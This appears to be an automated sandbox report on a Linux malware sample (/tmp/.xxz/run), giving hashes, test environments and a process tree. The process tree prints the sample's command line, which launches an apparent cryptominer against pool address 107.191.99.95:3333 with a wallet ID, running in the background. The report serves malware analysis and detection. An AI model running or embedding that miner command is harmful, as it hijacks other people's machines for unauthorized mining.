Analysis
max time kernel: 0s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240508-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 18-05-2024 02:29
Behavioral tasks
behavioral1: sample .xxz/h32, resource ubuntu2004-amd64-20240508-en
behavioral2: sample .xxz/h64, resource ubuntu2004-amd64-20240508-en
behavioral3: sample .xxz/md, resource ubuntu2004-amd64-20240508-en
behavioral4: sample .xxz/run, resource ubuntu1804-amd64-20240508-en
behavioral5: sample .xxz/run, resource debian9-armhf-20240226-en
behavioral6: sample .xxz/run, resource debian9-mipsbe-20240418-en
behavioral7: sample .xxz/run, resource debian9-mipsel-20240226-en
General
Target: .xxz/run
Size: 495B
MD5: dfc728a7c269d566af9049b916fb7289
SHA1: 2f6b58bb8e2f3a84841c278922aff076ef1c191d
SHA256: 77ad3f8ab8742bcbe204136eb2c49f435d582be9c5a05287b527944f33549a28
SHA512: 6c05f0bb3122bdd22eae397f6b1788f4eabc28dec94818c83f4da90763a967af9c4891dc04f6cfd2732b85e2d82dda1817476aadcab1ddabed6a4321844665e6
Malware Config
Signatures
Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
Processes (description; IoC; process):
File opened for modification; /tmp/.xxz/bash.pid; run
Processes
/tmp/.xxz/run (command line: /tmp/.xxz/run)
  Writes file to tmp directory
  /usr/bin/nproc (command line: nproc)
  /bin/uname (command line: uname -m)
  /tmp/.xxz/h64 (command line: ./h64 -s xxxdz ./md -o 107.191.99.95:3333 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B)